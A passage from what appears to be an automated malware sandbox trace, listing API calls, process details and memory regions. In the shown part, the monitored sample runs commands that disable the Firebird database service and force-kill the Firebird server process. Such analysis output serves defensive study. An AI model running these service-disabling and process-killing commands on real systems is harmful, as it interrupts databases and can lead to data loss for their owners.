_MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0124.819] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0124.819] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0124.820] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config FirebirdServerDefaultInstance start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x469f370*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config FirebirdServerDefaultInstance start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x469f3bc | out: lpCommandLine="sc config FirebirdServerDefaultInstance start= disabled", lpProcessInformation=0x469f3bc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd1c, dwThreadId=0x714)) returned 1 [0124.908] CloseHandle (hObject=0xa4) returned 1 [0124.908] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0124.908] GetEnvironmentStringsW () returned 0x49d9f30* [0124.908] FreeEnvironmentStringsA (penv="=") returned 1 [0124.908] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0125.013] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x469f354 | out: lpExitCode=0x469f354*=0x424) returned 1 [0125.013] CloseHandle (hObject=0xa8) returned 1 [0125.013] _vsnwprintf (in: _Buffer=0x469f43c, _BufferCount=0x13, _Format="%08X", _ArgList=0x469f35c | out: _Buffer="00000424") returned 8 [0125.013] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0125.013] GetEnvironmentStringsW () returned 0x49db388* [0125.013] FreeEnvironmentStringsA (penv="=") returned 1 [0125.013] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0125.013] GetEnvironmentStringsW () returned 0x49db388* [0125.013] FreeEnvironmentStringsA (penv="=") returned 1 [0125.013] DeleteProcThreadAttributeList (in: lpAttributeList=0x469f3e8 | out: lpAttributeList=0x469f3e8) [0125.013] _get_osfhandle (_FileHandle=1) returned 0x3c [0125.013] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0125.013] _get_osfhandle (_FileHandle=1) returned 0x3c [0125.013] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0125.014] _get_osfhandle (_FileHandle=0) returned 0x38 [0125.014] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0125.014] SetConsoleInputExeNameW () returned 0x1 [0125.014] GetConsoleOutputCP () returned 0x1b5 [0125.014] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0125.014] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.014] exit (_Code=1060) Thread: id = 342 os_tid = 0xcb8 Process: id = "80" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3d8d8000" os_pid = "0xccc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "79" os_parent_pid = "0xcc8" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5188 start_va = 0x7f1a4000 end_va = 0x7f1a4fff entry_point = 0x0 region_type = private name = "private_0x000000007f1a4000" filename = "" Region: id = 5189 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5190 start_va = 0xe5a9fe0000 end_va = 0xe5a9ffffff entry_point = 0x0 region_type = private name = "private_0x000000e5a9fe0000" filename = "" Region: id = 5191 start_va = 0xe5aa000000 end_va = 0xe5aa013fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e5aa000000" filename = "" Region: id = 5192 start_va = 0xe5aa020000 end_va = 0xe5aa05ffff entry_point = 0x0 region_type = private name = "private_0x000000e5aa020000" filename = "" Region: id = 5193 start_va = 0x7df5ffea0000 end_va = 0x7ff5ffe9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffea0000" filename = "" Region: id = 5194 start_va = 0x7ff6c4190000 end_va = 0x7ff6c41b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4190000" filename = "" Region: id = 5195 start_va = 0x7ff6c41bb000 end_va = 0x7ff6c41bbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41bb000" filename = "" Region: id = 5196 start_va = 0x7ff6c41be000 end_va = 0x7ff6c41bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41be000" filename = "" Region: id = 5197 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 5198 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5199 start_va = 0xe5aa130000 end_va = 0xe5aa22ffff entry_point = 0x0 region_type = private name = "private_0x000000e5aa130000" filename = "" Region: id = 5200 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5201 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5202 start_va = 0xe5a9fe0000 end_va = 0xe5a9feffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e5a9fe0000" filename = "" Region: id = 5203 start_va = 0xe5a9ff0000 end_va = 0xe5a9ff6fff entry_point = 0x0 region_type = private name = "private_0x000000e5a9ff0000" filename = "" Region: id = 5204 start_va = 0xe5aa060000 end_va = 0xe5aa11dfff entry_point = 0xe5aa060000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5205 start_va = 0xe5aa120000 end_va = 0xe5aa120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e5aa120000" filename = "" Region: id = 5206 start_va = 0xe5aa230000 end_va = 0xe5aa26ffff entry_point = 0x0 region_type = private name = "private_0x000000e5aa230000" filename = "" Region: id = 5207 start_va = 0xe5aa270000 end_va = 0xe5aa276fff entry_point = 0x0 region_type = private name = "private_0x000000e5aa270000" filename = "" Region: id = 5208 start_va = 0xe5aa280000 end_va = 0xe5aa407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e5aa280000" filename = "" Region: id = 5209 start_va = 0xe5aa410000 end_va = 0xe5aa410fff entry_point = 0x0 region_type = private name = "private_0x000000e5aa410000" filename = "" Region: id = 5210 start_va = 0xe5aa420000 end_va = 0xe5aa420fff entry_point = 0x0 region_type = private name = "private_0x000000e5aa420000" filename = "" Region: id = 5211 start_va = 0xe5aa460000 end_va = 0xe5aa46ffff entry_point = 0x0 region_type = private name = "private_0x000000e5aa460000" filename = "" Region: id = 5212 start_va = 0xe5aa470000 end_va = 0xe5aa5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e5aa470000" filename = "" Region: id = 5213 start_va = 0xe5aa600000 end_va = 0xe5ab9fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e5aa600000" filename = "" Region: id = 5214 start_va = 0x7ff6c4090000 end_va = 0x7ff6c418ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4090000" filename = "" Region: id = 5215 start_va = 0x7ff6c41bc000 end_va = 0x7ff6c41bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41bc000" filename = "" Region: id = 5216 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 5217 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5218 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5219 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5220 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5221 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5222 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5223 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5224 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5225 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5226 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5227 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 339 os_tid = 0xcbc Thread: id = 340 os_tid = 0xcac Thread: id = 341 os_tid = 0xcc0 Process: id = "81" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3d324000" os_pid = "0xd1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "79" os_parent_pid = "0xcc8" cmd_line = "sc config FirebirdServerDefaultInstance start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5241 start_va = 0x710000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 5242 start_va = 0x730000 end_va = 0x731fff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 5243 start_va = 0x740000 end_va = 0x753fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 5244 start_va = 0x760000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 5245 start_va = 0x7a0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 5246 start_va = 0x7e0000 end_va = 0x7e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 5247 start_va = 0x7f0000 end_va = 0x7f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 5248 start_va = 0x800000 end_va = 0x801fff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 5249 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 5250 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 5251 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5252 start_va = 0x7f340000 end_va = 0x7f362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f340000" filename = "" Region: id = 5253 start_va = 0x7f36b000 end_va = 0x7f36bfff entry_point = 0x0 region_type = private name = "private_0x000000007f36b000" filename = "" Region: id = 5254 start_va = 0x7f36c000 end_va = 0x7f36efff entry_point = 0x0 region_type = private name = "private_0x000000007f36c000" filename = "" Region: id = 5255 start_va = 0x7f36f000 end_va = 0x7f36ffff entry_point = 0x0 region_type = private name = "private_0x000000007f36f000" filename = "" Region: id = 5256 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5257 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5258 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5259 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5260 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5261 start_va = 0x910000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 5262 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5263 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5264 start_va = 0x9c0000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 5265 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5266 start_va = 0x710000 end_va = 0x71ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 5267 start_va = 0x720000 end_va = 0x723fff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 5268 start_va = 0x810000 end_va = 0x8cdfff entry_point = 0x810000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5269 start_va = 0x8d0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 5270 start_va = 0x920000 end_va = 0x95ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 5271 start_va = 0xb70000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 5272 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5273 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5274 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5275 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5276 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5277 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5278 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5279 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5280 start_va = 0x7f240000 end_va = 0x7f33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f240000" filename = "" Region: id = 5281 start_va = 0x7f368000 end_va = 0x7f36afff entry_point = 0x0 region_type = private name = "private_0x000000007f368000" filename = "" Region: id = 5282 start_va = 0xb80000 end_va = 0xc5efff entry_point = 0xb80000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5283 start_va = 0x960000 end_va = 0x971fff entry_point = 0x960000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 343 os_tid = 0x714 [0124.941] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0124.941] __set_app_type (_Type=0x1) [0124.941] __p__fmode () returned 0x77ac4d6c [0124.941] __p__commode () returned 0x77ac5b1c [0124.941] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0124.941] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0124.941] SetThreadUILanguage (LangId=0x0) returned 0x409 [0124.943] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0124.943] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0124.943] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0124.943] _wcsicmp (_String1="config", _String2="query") returned -14 [0124.944] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0124.944] _wcsicmp (_String1="config", _String2="start") returned -16 [0124.944] _wcsicmp (_String1="config", _String2="pause") returned -13 [0124.944] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0124.944] _wcsicmp (_String1="config", _String2="control") returned -14 [0124.944] _wcsicmp (_String1="config", _String2="continue") returned -14 [0124.944] _wcsicmp (_String1="config", _String2="stop") returned -16 [0124.944] _wcsicmp (_String1="config", _String2="config") returned 0 [0124.944] ResolveDelayLoadedAPI () returned 0x77262c10 [0124.944] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x9c8590 [0124.946] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0124.946] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0124.946] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0124.946] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0124.946] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0124.946] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0124.946] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0124.946] OpenServiceW (hSCManager=0x9c8590, lpServiceName="FirebirdServerDefaultInstance", dwDesiredAccess=0x3) returned 0x0 [0124.946] GetLastError () returned 0x424 [0124.946] _ultow (in: _Dest=0x424, _Radix=8255908 | out: _Dest=0x424) returned="1060" [0124.946] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0124.948] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x7df980, nSize=0x2, Arguments=0x7df998 | out: lpBuffer="褠\x9c燎}蔔è") returned 0x62 [0125.008] GetFileType (hFile=0x3c) returned 0x2 [0125.008] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x7df964 | out: lpMode=0x7df964) returned 1 [0125.008] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x9c8920*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x7df974, lpReserved=0x0 | out: lpBuffer=0x9c8920*, lpNumberOfCharsWritten=0x7df974*=0x62) returned 1 [0125.008] LocalFree (hMem=0x9c8920) returned 0x0 [0125.008] LocalFree (hMem=0x0) returned 0x0 [0125.008] CloseServiceHandle (hSCObject=0x9c8590) returned 1 [0125.009] LocalFree (hMem=0x0) returned 0x0 [0125.009] exit (_Code=1060) Thread: id = 344 os_tid = 0x114 Process: id = "82" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3a081000" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c taskkill \\/IM fb_inet_server.exe \\/F" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5284 start_va = 0x360000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 5285 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 5286 start_va = 0x390000 end_va = 0x3a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 5287 start_va = 0x3b0000 end_va = 0x3b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 5288 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5289 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 5290 start_va = 0x4410000 end_va = 0x444ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 5291 start_va = 0x4450000 end_va = 0x454ffff entry_point = 0x0 region_type = private name = "private_0x0000000004450000" filename = "" Region: id = 5292 start_va = 0x4550000 end_va = 0x4550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004550000" filename = "" Region: id = 5293 start_va = 0x4560000 end_va = 0x4561fff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 5294 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5295 start_va = 0x7f0f0000 end_va = 0x7f112fff entry_point = 